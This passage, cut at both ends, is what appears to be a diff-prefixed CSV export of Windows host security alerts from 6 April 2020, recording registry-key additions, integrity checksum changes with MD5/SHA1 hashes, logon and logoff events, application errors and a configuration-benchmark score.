+" +"Apr 6, 2020 @ 14:34:41.758",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_36ceed' was added. +" +"Apr 6, 2020 @ 14:34:41.742",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\ConsentUxUserSvc_36ceed\Security' was added. +" +"Apr 6, 2020 @ 14:34:41.446",4,"Summary event of the report's signatures", +"Apr 6, 2020 @ 14:34:40.913",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:34:40.726",9,"Windows Application error event", +"Apr 6, 2020 @ 14:34:39.851",4,"Summary event of the report's signatures", +"Apr 6, 2020 @ 14:34:39.555",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_5eaf9d' was added. +" +"Apr 6, 2020 @ 14:34:39.540",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_5eaf9d\Security' was added. +" +"Apr 6, 2020 @ 14:34:39.524",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_4cf759' was added. +" +"Apr 6, 2020 @ 14:34:39.507",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_4cf759\Security' was added. +" +"Apr 6, 2020 @ 14:34:39.491",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_36ceed' was added. +" +"Apr 6, 2020 @ 14:34:39.476",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CDPUserSvc_36ceed\Security' was added. +" +"Apr 6, 2020 @ 14:34:39.461",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_5eaf9d' was added. +" +"Apr 6, 2020 @ 14:34:39.445",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_5eaf9d\Security' was added. 
+" +"Apr 6, 2020 @ 14:34:39.429",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_4cf759' was added. +" +"Apr 6, 2020 @ 14:34:39.414",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_4cf759\Security' was added. +" +"Apr 6, 2020 @ 14:34:39.383",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_36ceed' was added. +" +"Apr 6, 2020 @ 14:34:39.367",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\cbdhsvc_36ceed\Security' was added. +" +"Apr 6, 2020 @ 14:34:39.351",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_5eaf9d' was added. +" +"Apr 6, 2020 @ 14:34:39.336",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_5eaf9d\Security' was added. +" +"Apr 6, 2020 @ 14:34:39.322",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_4cf759' was added. +" +"Apr 6, 2020 @ 14:34:39.289",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_4cf759\Security' was added. +" +"Apr 6, 2020 @ 14:34:39.273",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_36ceed' was added. +" +"Apr 6, 2020 @ 14:34:39.257",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\CaptureService_36ceed\Security' was added. +" +"Apr 6, 2020 @ 14:34:38.867",9,"Windows Application error event", +"Apr 6, 2020 @ 14:34:37.180",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_5eaf9d' was added. +" +"Apr 6, 2020 @ 14:34:37.151",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_5eaf9d\TriggerInfo\4' was added. 
+" +"Apr 6, 2020 @ 14:34:37.133",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_5eaf9d\TriggerInfo\3' was added. +" +"Apr 6, 2020 @ 14:34:37.104",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_5eaf9d\TriggerInfo\2' was added. +" +"Apr 6, 2020 @ 14:34:37.086",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_5eaf9d\TriggerInfo\1' was added. +" +"Apr 6, 2020 @ 14:34:37.071",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_5eaf9d\TriggerInfo\0' was added. +" +"Apr 6, 2020 @ 14:34:37.056",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_5eaf9d\Security' was added. +" +"Apr 6, 2020 @ 14:34:37.026",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_4cf759' was added. +" +"Apr 6, 2020 @ 14:34:37.011",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_4cf759\TriggerInfo\4' was added. +" +"Apr 6, 2020 @ 14:34:36.992",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_4cf759\TriggerInfo\3' was added. +" +"Apr 6, 2020 @ 14:34:36.977",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_4cf759\TriggerInfo\2' was added. +" +"Apr 6, 2020 @ 14:34:36.961",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_4cf759\TriggerInfo\1' was added. +" +"Apr 6, 2020 @ 14:34:36.945",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_4cf759\TriggerInfo\0' was added. 
+" +"Apr 6, 2020 @ 14:34:36.929",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_4cf759\Security' was added. +" +"Apr 6, 2020 @ 14:34:36.898",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_36ceed' was added. +" +"Apr 6, 2020 @ 14:34:36.882",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_36ceed\TriggerInfo\4' was added. +" +"Apr 6, 2020 @ 14:34:36.851",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_36ceed\TriggerInfo\3' was added. +" +"Apr 6, 2020 @ 14:34:36.836",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_36ceed\TriggerInfo\2' was added. +" +"Apr 6, 2020 @ 14:34:35.890",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_36ceed\TriggerInfo\1' was added. +" +"Apr 6, 2020 @ 14:34:35.840",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_36ceed\TriggerInfo\0' was added. +" +"Apr 6, 2020 @ 14:34:35.830",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BluetoothUserService_36ceed\Security' was added. +" +"Apr 6, 2020 @ 14:34:35.742",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BITS' checksum changed. +Old md5sum was: '775174ea9bf25c40ba381ca284d7511d' +New md5sum is : '6a4fdf3a9f7dc36fc03599f720d484d3' +Old sha1sum was: 'eab80f5279cedff3dd227a62f8828aa899a27475' +New sha1sum is : '9f469b80d1166a11ab0299760c6cb444ef555670' +" +"Apr 6, 2020 @ 14:34:32.680",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_5eaf9d' was added. 
+" +"Apr 6, 2020 @ 14:34:32.649",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_5eaf9d\Security' was added. +" +"Apr 6, 2020 @ 14:34:32.632",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_4cf759' was added. +" +"Apr 6, 2020 @ 14:34:32.617",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_4cf759\Security' was added. +" +"Apr 6, 2020 @ 14:34:32.601",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_36ceed' was added. +" +"Apr 6, 2020 @ 14:34:32.586",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\BcastDVRUserService_36ceed\Security' was added. +" +"Apr 6, 2020 @ 14:34:32.569",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-5' was added. +" +"Apr 6, 2020 @ 14:34:32.554",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-4' was added. +" +"Apr 6, 2020 @ 14:34:32.538",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-3' was added. +" +"Apr 6, 2020 @ 14:34:32.523",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-90-0-2' checksum changed. +Old md5sum was: '2c61255f33c4fb43a225480258ec4380' +New md5sum is : '41f836f91bdb9b4b1a6dd53b45a586c1' +Old sha1sum was: '3d522bd22a6f5275d938735abc8eefcd62d2e82c' +New sha1sum is : 'd88322091bdfa95dd00b43c94043be94669c10d6' +" +"Apr 6, 2020 @ 14:34:32.508",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. 
+Old md5sum was: 'a94717f9cc73ebc01ca04b0844af85df' +New md5sum is : 'c3d3a1d8a57a3e55516e095343ffc85e' +Old sha1sum was: 'f239544f614ade15297b6b97ca2eb82e97b517de' +New sha1sum is : '3d8f8d08699f73356fd80de7e59de1c352109663' +" +"Apr 6, 2020 @ 14:34:32.476",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\bam\State\UserSettings\S-1-5-18' checksum changed. +Old md5sum was: '6b831538504aed43ca0079095c23729d' +New md5sum is : '9db7d225f461184a37dd7daf55bd9455' +Old sha1sum was: '1d76c9113ab9a7701e6f8efb24ed1dfcfe36b391' +New sha1sum is : '6ad64ec507008882176ba696c556974a828a8fce' +" +"Apr 6, 2020 @ 14:34:30.197",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_5eaf9d' was added. +" +"Apr 6, 2020 @ 14:34:30.186",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_5eaf9d\Security' was added. +" +"Apr 6, 2020 @ 14:34:30.168",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_4cf759' was added. +" +"Apr 6, 2020 @ 14:34:30.151",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_4cf759\Security' was added. +" +"Apr 6, 2020 @ 14:34:30.132",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_36ceed' was added. +" +"Apr 6, 2020 @ 14:34:30.117",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\AarSvc_36ceed\Security' was added. 
+" +"Apr 6, 2020 @ 14:34:29.523",3,"Software Protection service scheduled successfully", +"Apr 6, 2020 @ 14:33:59.560",5,"License Activation (slui.exe) failed", +"Apr 6, 2020 @ 14:33:51.671",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 14:33:51.635",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 14:33:51.385",5,"SessionEnv was unavailable to handle a notification event", +"Apr 6, 2020 @ 14:33:51.337",7,"SessionEnv was unavailable to handle a critical notification event", +"Apr 6, 2020 @ 14:29:18.977",10,"Multiple System error events", +"Apr 6, 2020 @ 14:29:18.946",5,"Windows System error event", +"Apr 6, 2020 @ 14:29:16.189",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:29:16.166",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:29:16.089",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:29:16.058",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:29:16.043",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:29:16.024",5,"Windows Push Notifications User Service_4cf759 terminated unexpectedly", +"Apr 6, 2020 @ 14:29:16.010",5,"Connected Devices Platform User Service_4cf759 terminated unexpectedly", +"Apr 6, 2020 @ 14:29:15.993",5,"Clipboard User Service_4cf759 terminated unexpectedly", +"Apr 6, 2020 @ 14:29:09.649",4,"Summary event of the report's signatures", +"Apr 6, 2020 @ 14:29:08.845",9,"Windows Application error event", +"Apr 6, 2020 @ 14:29:08.843",4,"Summary event of the report's signatures", +"Apr 6, 2020 @ 14:29:07.852",9,"Windows Application error event", +"Apr 6, 2020 @ 14:29:05.883",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:29:05.837",4,"Summary event of the report's signatures", +"Apr 6, 2020 @ 14:29:05.820",9,"Windows Application error event", +"Apr 6, 2020 @ 14:29:05.759",3,"Software Protection service scheduled successfully", +"Apr 6, 2020 @ 14:28:44.811",3,"Service startup type was changed", +"Apr 6, 2020 @ 14:28:43.445",5,"SCA summary: Benchmark for Windows audit: Score less than 80% (68)", +"Apr 6, 2020 @ 14:28:40.336",5,"Benchmark for Windows 
audit: Ensure 'MSS: (AutoAdminLogon) Enable Automatic Logon (not recommended)' is set to 'Disabled': Status changed from failed to 'not applicable'", +"Apr 6, 2020 @ 14:28:33.648",5,"License Activation (slui.exe) failed", +"Apr 6, 2020 @ 14:28:26.549",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 14:28:26.526",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 14:28:25.856",5,"SessionEnv was unavailable to handle a notification event", +"Apr 6, 2020 @ 14:28:25.517",7,"SessionEnv was unavailable to handle a critical notification event", +"Apr 6, 2020 @ 14:28:11.226",3,"Software Protection service scheduled successfully", +"Apr 6, 2020 @ 14:28:08.867",5,"Windows System error event", +"Apr 6, 2020 @ 14:28:08.851",5,"Windows System error event", +"Apr 6, 2020 @ 14:28:06.069",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:28:06.054",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:28:06.025",3,"Windows Logon Success", +"Apr 6, 2020 @ 14:28:05.992",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:28:05.977",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:28:05.946",5,"Clipboard User Service_36ceed terminated unexpectedly", +"Apr 6, 2020 @ 14:28:05.930",5,"Windows Push Notifications User Service_36ceed terminated unexpectedly", +"Apr 6, 2020 @ 14:28:05.914",5,"Connected Devices Platform User Service_36ceed terminated unexpectedly", +"Apr 6, 2020 @ 14:27:55.807",3,"Windows User Logoff", +"Apr 6, 2020 @ 14:27:54.743",4,"Summary event of the report's signatures", +"Apr 6, 2020 @ 14:27:53.492",9,"Windows Application error event", +"Apr 6, 2020 @ 14:27:41.586",5,"License Activation (slui.exe) failed", +"Apr 6, 2020 @ 14:27:41.570",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon' checksum changed. 
+Old md5sum was: '93c2f688a68bea92ca0316b543b731f9' +New md5sum is : 'c4a796c4c34771728ed542fd1a758c62' +Old sha1sum was: '562310fa74b7d8dc4147b75600dba6658f8f1bc8' +New sha1sum is : '6390383b035997e115a3b000b6de17b37d1d41e4' +" +"Apr 6, 2020 @ 14:27:41.540",5,"File added to the system.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\3\S-1-5-21-438079597-2123118846-2669748851-1001' was added. +" +"Apr 6, 2020 @ 14:27:41.522",5,"File added to the system.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\2\S-1-5-21-438079597-2123118846-2669748851-1001' was added. +" +"Apr 6, 2020 @ 14:27:41.510",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\VolatileUserMgrKey\1\S-1-5-21-438079597-2123118846-2669748851-1001' checksum changed. +Old md5sum was: 'a0df8d6e879d924da3288b2aa0b85114' +New md5sum is : '2a59348304c018619f9ec9335491c9b3' +Old sha1sum was: '5b3369bb152c26552a26be399f0ea043686a36fe' +New sha1sum is : '8b9b67bed7bf33200a32a2aebb4f71c9fae666aa' +" +"Apr 6, 2020 @ 14:27:40.071",7,"Integrity checksum changed.","File '[x64] HKEY_LOCAL_MACHINE\Software\Microsoft\Windows NT\CurrentVersion\Windows' checksum changed. 
+Old md5sum was: '49574a9da5b73510ecb8125c7786d037' +New md5sum is : 'a94ecbd5eaeee72bd7ceca1faad96e30' +Old sha1sum was: 'fc3c9a4be6b806a974693af1dc528845db7631da' +New sha1sum is : '269518a35686493cde84837b1668ea322e4d3d13' +" +"Apr 6, 2020 @ 14:27:31.625",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 14:27:31.605",3,"Windows Workstation Logon Success", +"Apr 6, 2020 @ 14:27:31.199",5,"SessionEnv was unavailable to handle a notification event", +"Apr 6, 2020 @ 14:27:31.159",7,"SessionEnv was unavailable to handle a critical notification event", +"Apr 6, 2020 @ 14:27:25.350",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\TimeProviders\NtpClient' checksum changed. +Old md5sum was: 'f7ede040f0bd50f2432cce9ba9720243' +New md5sum is : '729d0877659e4797d3983fddb4576047' +Old sha1sum was: '01b3e39aa29d8c3fccfcaa1089c2a0890d3baaae' +New sha1sum is : '109945df285ffff37e08eaab1d91e55cb59c26c8' +" +"Apr 6, 2020 @ 14:27:25.320",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits' checksum changed. +Old md5sum was: 'd8c503783bde9bba94c7b5e9b6f56d5e' +New md5sum is : 'a45d92c5da48b32074d593f445bd1d73' +Old sha1sum was: 'cd5545ba37f52a71c7212842358b2c7891cc67c1' +New sha1sum is : '7ad132c3e4354ce6748313a2eaf72d08a7d0ac2a' +" +"Apr 6, 2020 @ 14:27:25.305",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\W32Time\SecureTimeLimits\RunTime' checksum changed. +Old md5sum was: '3bed6b4b8101da842bb6afe04a8271c2' +New md5sum is : 'e18c1ccf736dc8f14e0a245e1f699739' +Old sha1sum was: '6bcfa900864cb27898f9c3bf26b53fb3b0eb9d2c' +New sha1sum is : 'f3d9e58c5181cea0e86c13a904867deadeab2b49' +" +"Apr 6, 2020 @ 14:27:25.055",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\VSS\Diag\VolSnap' checksum changed. 
+Old md5sum was: 'a6934418b12b085c34f2dbaa9e9fa7a0' +New md5sum is : '4dc723cacf24668548d4626cd43a3355' +Old sha1sum was: 'd9336cc746599b17846d9aa0e03da9cf70d1f3b7' +New sha1sum is : 'd81ab069195c4657ae5fbbccadc8597e7deedd15' +" +"Apr 6, 2020 @ 14:27:23.663",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Vid\Parameters\Wdf' checksum changed. +Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : 'fcdb07c6a1ed824ae9455a64b2c0bb9e' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : '584b2e2ecab9f7b853efa748028018d4698a2e87' +" +"Apr 6, 2020 @ 14:27:23.321",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\vdrvroot\Parameters\Wdf' checksum changed. +Old md5sum was: 'b132e65b4963a54ebee91bcab8914621' +New md5sum is : '320bb6f0c3f0f9ca6201376818440454' +Old sha1sum was: '744e1fde2f3ae486cbff69a205e315e1c2f088e3' +New sha1sum is : '6f0a84fcaed413ed440ea1ba902efe1c0d69c1ef' +" +"Apr 6, 2020 @ 14:27:22.772",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_2c34c' was added. +" +"Apr 6, 2020 @ 14:27:22.756",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_2c34c\Security' was added. +" +"Apr 6, 2020 @ 14:27:22.741",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_163a67' was added. +" +"Apr 6, 2020 @ 14:27:22.725",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UserDataSvc_163a67\Security' was added. +" +"Apr 6, 2020 @ 14:27:22.616",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBXHCI\Parameters\Wdf' checksum changed. 
+Old md5sum was: 'f6949813e6b9d992278b95b7f209e047' +New md5sum is : '00f520782a4ab535f2911267c06438d9' +Old sha1sum was: '8db1fc943f83c30b4bc07f1ed394492c392e7722' +New sha1sum is : 'bff3f6156b18df9a1ad0d484b5296bda6e699299' +" +"Apr 6, 2020 @ 14:27:22.459",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\USBHUB3\Parameters\Wdf' checksum changed. +Old md5sum was: '342765c52f3fd7b50e5188adb30a0ede' +New md5sum is : '8e9cef389829897cea6eca230b2aa97f' +Old sha1sum was: '6d803f7cc7de0ae861402e45b8a1442595a4b544' +New sha1sum is : 'cc8206466c207f0619ed289d336d1d965992e198' +" +"Apr 6, 2020 @ 14:27:21.475",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_2c34c' was added. +" +"Apr 6, 2020 @ 14:27:21.459",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_2c34c\Security' was added. +" +"Apr 6, 2020 @ 14:27:21.444",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_163a67' was added. +" +"Apr 6, 2020 @ 14:27:21.428",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\UnistoreSvc_163a67\Security' was added. +" +"Apr 6, 2020 @ 14:27:21.272",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\umbus\Parameters\Wdf' checksum changed. +Old md5sum was: '67c10bdce559c177fe0d89a2be194410' +New md5sum is : 'fcdb07c6a1ed824ae9455a64b2c0bb9e' +Old sha1sum was: '4bac1afb15742d4fecc03d097a595ea33eed5376' +New sha1sum is : '584b2e2ecab9f7b853efa748028018d4698a2e87' +" +"Apr 6, 2020 @ 14:27:18.662",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\Tcpip\Parameters\Interfaces\{10cb9356-9dd8-4d03-959f-611e879a11a6}' checksum changed. 
+Old md5sum was: 'bb30a4865d0fe96a2d7b53b843e8fa0a' +New md5sum is : '05e13bdf1f9b7eb3a1f3de4ca253e89f' +Old sha1sum was: '98ca91600e4060c62dc2cc91468e632c4fdc3ef6' +New sha1sum is : 'feaa05d6b5b4ac5a77156e9c4c2199f6a91a5917' +" +"Apr 6, 2020 @ 14:27:15.664",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\srvnet\Parameters' checksum changed. +Old md5sum was: '3d3a643354245020081ae89e531e5f43' +New md5sum is : 'b7992042185fc6ec85e366e31893c993' +Old sha1sum was: '388ea0001ce3a9c23720ba87edb0e1b1510b7b4e' +New sha1sum is : '7da8cd2c012f8b55d1d5ce23f9ccdf45379c55ad' +" +"Apr 6, 2020 @ 14:27:15.398",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\spoolsr' was added. +" +"Apr 6, 2020 @ 14:27:11.350",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\RestrictedServices\AppIso\FirewallRules' checksum changed. +Old md5sum was: '0231145ca99a840395c3772f19d7bf2e' +New md5sum is : '5499f2465b93c7b9d2932c510d331d41' +Old sha1sum was: '8bb61b82ef06aca0226aabaabd5850edec858d9a' +New sha1sum is : 'e252541cf73578cba0af49aaa7f38f21399e2f73' +" +"Apr 6, 2020 @ 14:27:11.257",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch2' checksum changed. +Old md5sum was: '5de0ef21cee3c7b87f2fab30b8b06e2e' +New md5sum is : '671078222c6f28f8a987ef233af7d5a5' +Old sha1sum was: '95450da791d27d0a0e456663988211c24b30dbec' +New sha1sum is : 'c62d69328b5a046dd8494e6a38df8074f8310102' +" +"Apr 6, 2020 @ 14:27:11.241",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\SharedAccess\Epoch' checksum changed. 
+Old md5sum was: '728627011eedd28411cf4e1f2a30d1ca' +New md5sum is : '7f4e2820a9e8df5c63678e03b97248cc' +Old sha1sum was: '26576187b3bbee39309e7ebe95de85749ea7b9d2' +New sha1sum is : '0b434b24c6b38ea405074bb98c33b674da54a900' +" +"Apr 6, 2020 @ 14:27:06.428",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\rdyboost\Diagnostics' checksum changed. +Old md5sum was: 'b94f00fb649e58278413ddb218687776' +New md5sum is : 'fa742e572a0ab3ad838cdc36f548a2e7' +Old sha1sum was: '4e632334dcf3fb5f87a71c66694dd9a1eb5fdbc7' +New sha1sum is : '4bd92b98f3142283ddbfa0b8875cc0e446f8a651' +" +"Apr 6, 2020 @ 14:27:04.894",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2c34c' was added. +" +"Apr 6, 2020 @ 14:27:04.881",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_163a67' was added. +" +"Apr 6, 2020 @ 14:27:04.881",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_2c34c\Security' was added. +" +"Apr 6, 2020 @ 14:27:04.808",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PrintWorkflowUserSvc_163a67\Security' was added. +" +"Apr 6, 2020 @ 14:27:03.952",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2c34c' was added. +" +"Apr 6, 2020 @ 14:27:03.931",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_2c34c\Security' was added. +" +"Apr 6, 2020 @ 14:27:03.912",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_163a67' was added. +" +"Apr 6, 2020 @ 14:27:03.898",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\PimIndexMaintenanceSvc_163a67\Security' was added. 
+" +"Apr 6, 2020 @ 14:27:02.350",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2c34c' was added. +" +"Apr 6, 2020 @ 14:27:02.334",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_2c34c\Security' was added. +" +"Apr 6, 2020 @ 14:27:02.319",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_163a67' was added. +" +"Apr 6, 2020 @ 14:27:02.303",5,"File added to the system.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\OneSyncSvc_163a67\Security' was added. +" +"Apr 6, 2020 @ 14:26:59.803",7,"Integrity checksum changed.","File 'HKEY_LOCAL_MACHINE\System\CurrentControlSet\Services\NdisVirtualBus\Parameters\Wdf' checksum changed. +Old md5sum was: '91719a43ee1d9abe2cfbc1a69b82550c' +New md5sum is : 'f906c668d9a9517e97299e9a3d5136fe' +Old sha1sum was: 'c9429e02ac797b3eeb56ad03665a88cc10366270' +New sha1sum is : '9861531a255dbfbd2c4e14a0673818cc18a6ee0d' +" +"Apr 6, 2020 @ 